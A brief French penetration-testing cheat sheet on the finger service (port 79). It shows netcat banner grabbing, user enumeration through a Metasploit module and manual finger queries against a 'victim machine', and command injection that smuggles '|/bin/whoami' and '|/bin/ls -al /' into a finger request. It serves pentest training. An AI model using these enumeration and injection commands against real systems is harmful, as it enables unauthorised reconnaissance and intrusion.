Infos:
Finger est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d’ordinateurs. Il indique généralement le nom de connexion, le nom complet et éventuellement d’autres détails sur l’utilisateur que vous pointez. Ces détails peuvent inclure l’emplacement du bureau et le numéro de téléphone, le temps de connexion, le temps d’inactivité, l’heure de la dernière lecture de ses mails, ainsi que les fichiers de l’utilisateur.
Port par défaut : 79
PORT STATE SERVICE 79/tcp open finger
2. Enumération
2.1 Récupération de la bannière et connexion
nc -vn <IP> 79 echo "root" | nc -vn <IP> 79
2.2 Enumération des utilisateurs
Utilisation du module metasploit :
use auxiliary/scanner/finger/finger_users
ou vous pouvez le faire à la main :
finger @<Machine_Victime> #Liste les utilisateurs finger user1@<Machine_Victime> #Capture des infos sur l'utilisateur user1
2.3 Exécution de commandes
finger "|/bin/whoami@domain_name.com" finger "|/bin/ls -al /@domain_name.com"
